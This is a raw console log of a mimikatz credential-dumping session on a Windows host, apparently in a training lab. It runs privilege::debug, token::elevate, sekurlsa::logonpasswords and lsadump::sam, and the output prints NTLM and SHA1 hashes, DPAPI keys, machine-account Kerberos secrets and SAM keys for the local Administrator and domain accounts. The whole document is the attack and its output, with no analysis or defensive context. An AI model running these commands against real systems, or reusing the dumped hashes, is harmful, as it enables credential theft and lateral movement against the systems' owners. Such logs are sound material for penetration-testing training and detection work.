
  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

484	{0;000003e7} 1 D 24879     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;00355028} 0 D 3515155   	SVCLIENT73\Administrator	S-1-5-21-5689513-2783704404-2070145878-500	(11g,24p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3538455   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1048824 (00000000:001000f8)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 10/05/2022 03:23:01
SID               : S-1-5-21-5689513-2783704404-2070145878-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * NTLM     : ee0c207898a5bccc01f38115019ca2fb
	 * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 934684 (00000000:000e431c)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SVCLIENT73
Logon Server      : SVCLIENT73
Logon Time        : 05/02/2022 06:30:40
SID               : S-1-5-21-5689513-2783704404-2070145878-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * NTLM     : ee0c207898a5bccc01f38115019ca2fb
	 * SHA1     : ef8a1ecb32d473d9d97d64d1eb5cd55efbb3d6bc
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : SVCLIENT73
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 123254 (00000000:0001e176)
Session           : Interactive from 1
User Name         : pete
Domain            : svcorp
Logon Server      : SV-DC01
Logon Time        : 05/02/2022 05:37:20
SID               : S-1-5-21-466546139-763938477-1796994327-1121
	msv :	
	 [00000003] Primary
	 * Username : pete
	 * Domain   : svcorp
	 * NTLM     : 0f951bc4fdc5dfcd148161420b9c6207
	 * SHA1     : 40100bec51af3d9ee79ebae0e4d553d8615bae53
	 * DPAPI    : 1edbe411d0b75aed07b0d20c24f99631
	tspkg :	
	wdigest :	
	 * Username : pete
	 * Domain   : svcorp
	 * Password : (null)
	kerberos :	
	 * Username : pete
	 * Domain   : SVCORP.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:16
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 51474 (00000000:0000c912)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:16
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * NTLM     : d88b95e656bec02cdeaa56b924d186c7
	 * SHA1     : 202903b2a6152f3e6f9c09a9f6841c023f336d22
	tspkg :	
	wdigest :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * Password : (null)
	kerberos :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp.com
	 * Password : 1a ae aa 11 7e c0 71 cf 4f d4 9a ac f6 8e 9a bd 7a d6 6f 48 da 41 6c 7a 66 cd 15 62 3d 14 8a 75 95 37 02 75 32 c6 c0 76 08 73 9e cf 7a 17 5e 7c 4d 07 1f a5 34 61 c3 8e 76 df 54 c9 c7 27 05 86 a2 36 ca f0 8f ed d4 1e 35 8b 8b a3 28 17 34 11 52 3b 06 62 e5 20 1c 28 cd e2 6c e6 52 a4 31 db 69 88 bb 2a 7b 46 30 20 61 dd af 9f ab 95 79 22 bd 60 ef 5e e6 df ef 50 26 ca f5 aa 06 3a d1 09 37 93 65 57 8e 28 1b 5f 10 d1 d5 bc bd 51 56 5b ab 00 06 6c 17 8c e7 e3 95 a3 55 5b 69 a4 fb ea 6e 9e 0a 5d 56 5c 9e 80 b0 f0 03 45 38 62 2b b2 bf bc fc d2 dc b6 4e 97 0a 63 1e 1f 54 79 5c e7 13 54 43 3c a3 72 9a 75 97 dd f9 4e 07 35 03 10 fd 79 1b 39 4a c9 ea 03 64 29 81 4d 58 ad b4 76 3d b8 ba 7c a5 26 4c a7 53 a5 5f d4 f1 bb 5a c7 
	ssp :	
	credman :	

Authentication Id : 0 ; 50591 (00000000:0000c59f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:16
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * NTLM     : d2162dd0fe2b41e57ed0e5798252c72c
	 * SHA1     : b69596004ed35d5a9cfabec70e55ee7ad59c2e38
	tspkg :	
	wdigest :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * Password : (null)
	kerberos :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp.com
	 * Password : c2 76 29 c7 fd 94 74 eb e2 7d 36 61 e9 ca 39 5a 36 b2 4f 4c a9 58 dc 25 4b 9d 11 a2 03 26 12 3d 8c ea 42 df 1f 3c 71 6b ae b5 cb f5 18 a3 9b 74 e2 b8 cc 78 d8 d9 6f 63 34 a4 02 a2 f7 0a e8 7e b2 d2 1d 45 f2 3b e8 9f 0b 27 b8 06 83 95 f7 32 a2 ef 33 b1 5f 67 9b 2b d3 a0 34 58 d1 f0 1c 34 e4 97 ad da 0d 39 b6 d9 ab 4c 97 0a 5c 23 51 99 a0 cf a0 94 bb 40 28 2a 3c 3f d1 84 c7 27 db 38 db 17 a4 1d 56 c5 05 77 1c 1e 69 45 eb 57 dd fb 74 90 b7 a4 f9 5d 16 ed 74 db 26 b1 5c 89 8c 77 73 7b 37 a5 9f 4a 3d ef 85 48 8c 04 99 9e 65 8a 05 1d f6 a7 01 78 5d 3e a9 67 c9 9d b8 cc b8 ea 31 19 5c bd 99 3a 43 3e b2 28 4d 6c e8 43 78 5a 12 3c 03 a8 30 95 b3 39 45 b2 80 75 56 58 34 49 0a 11 17 02 ce d9 b2 26 d6 2b 69 4a b7 8f 6b 98 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:16
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * NTLM     : d2162dd0fe2b41e57ed0e5798252c72c
	 * SHA1     : b69596004ed35d5a9cfabec70e55ee7ad59c2e38
	tspkg :	
	wdigest :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * Password : (null)
	kerberos :	
	 * Username : svclient73$
	 * Domain   : SVCORP.COM
	 * Password : c2 76 29 c7 fd 94 74 eb e2 7d 36 61 e9 ca 39 5a 36 b2 4f 4c a9 58 dc 25 4b 9d 11 a2 03 26 12 3d 8c ea 42 df 1f 3c 71 6b ae b5 cb f5 18 a3 9b 74 e2 b8 cc 78 d8 d9 6f 63 34 a4 02 a2 f7 0a e8 7e b2 d2 1d 45 f2 3b e8 9f 0b 27 b8 06 83 95 f7 32 a2 ef 33 b1 5f 67 9b 2b d3 a0 34 58 d1 f0 1c 34 e4 97 ad da 0d 39 b6 d9 ab 4c 97 0a 5c 23 51 99 a0 cf a0 94 bb 40 28 2a 3c 3f d1 84 c7 27 db 38 db 17 a4 1d 56 c5 05 77 1c 1e 69 45 eb 57 dd fb 74 90 b7 a4 f9 5d 16 ed 74 db 26 b1 5c 89 8c 77 73 7b 37 a5 9f 4a 3d ef 85 48 8c 04 99 9e 65 8a 05 1d f6 a7 01 78 5d 3e a9 67 c9 9d b8 cc b8 ea 31 19 5c bd 99 3a 43 3e b2 28 4d 6c e8 43 78 5a 12 3c 03 a8 30 95 b3 39 45 b2 80 75 56 58 34 49 0a 11 17 02 ce d9 b2 26 d6 2b 69 4a b7 8f 6b 98 
	ssp :	
	credman :	

Authentication Id : 0 ; 28854 (00000000:000070b6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:16
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * NTLM     : d2162dd0fe2b41e57ed0e5798252c72c
	 * SHA1     : b69596004ed35d5a9cfabec70e55ee7ad59c2e38
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SVCLIENT73$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 05/02/2022 05:37:15
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : SVCLIENT73$
	 * Domain   : svcorp
	 * Password : (null)
	kerberos :	
	 * Username : svclient73$
	 * Domain   : SVCORP.COM
	 * Password : c2 76 29 c7 fd 94 74 eb e2 7d 36 61 e9 ca 39 5a 36 b2 4f 4c a9 58 dc 25 4b 9d 11 a2 03 26 12 3d 8c ea 42 df 1f 3c 71 6b ae b5 cb f5 18 a3 9b 74 e2 b8 cc 78 d8 d9 6f 63 34 a4 02 a2 f7 0a e8 7e b2 d2 1d 45 f2 3b e8 9f 0b 27 b8 06 83 95 f7 32 a2 ef 33 b1 5f 67 9b 2b d3 a0 34 58 d1 f0 1c 34 e4 97 ad da 0d 39 b6 d9 ab 4c 97 0a 5c 23 51 99 a0 cf a0 94 bb 40 28 2a 3c 3f d1 84 c7 27 db 38 db 17 a4 1d 56 c5 05 77 1c 1e 69 45 eb 57 dd fb 74 90 b7 a4 f9 5d 16 ed 74 db 26 b1 5c 89 8c 77 73 7b 37 a5 9f 4a 3d ef 85 48 8c 04 99 9e 65 8a 05 1d f6 a7 01 78 5d 3e a9 67 c9 9d b8 cc b8 ea 31 19 5c bd 99 3a 43 3e b2 28 4d 6c e8 43 78 5a 12 3c 03 a8 30 95 b3 39 45 b2 80 75 56 58 34 49 0a 11 17 02 ce d9 b2 26 d6 2b 69 4a b7 8f 6b 98 
	ssp :	
	credman :	

mimikatz(commandline) # lsadump::sam
Domain : SVCLIENT73
SysKey : 0cab41aa181d5554baaa458072b8930d
Local SID : S-1-5-21-5689513-2783704404-2070145878

SAMKey : cffa05596739ef96dfa90eb6b26ab45f

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: ee0c207898a5bccc01f38115019ca2fb
    lm  - 0: 05a420f896c417b641090264d32dc189
    lm  - 1: 2840edb78d79120e1bd5ce57a089189f
    lm  - 2: c22fa3f02fab40f690dff9071381e84a
    ntlm- 0: ee0c207898a5bccc01f38115019ca2fb
    ntlm- 1: dcccbbb6d9985020052a69b2c815b1fa
    ntlm- 2: ee0c207898a5bccc01f38115019ca2fb

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000003e8 (1000)
User : defaultuser0
  Hash NTLM: b7bbb29159aaf020b7ff817e3027b2bc

RID  : 000003e9 (1001)
User : Offsec
  Hash NTLM: 5947859f1a39553d2bd2388b7c9df44c

mimikatz(commandline) # exit
Bye!
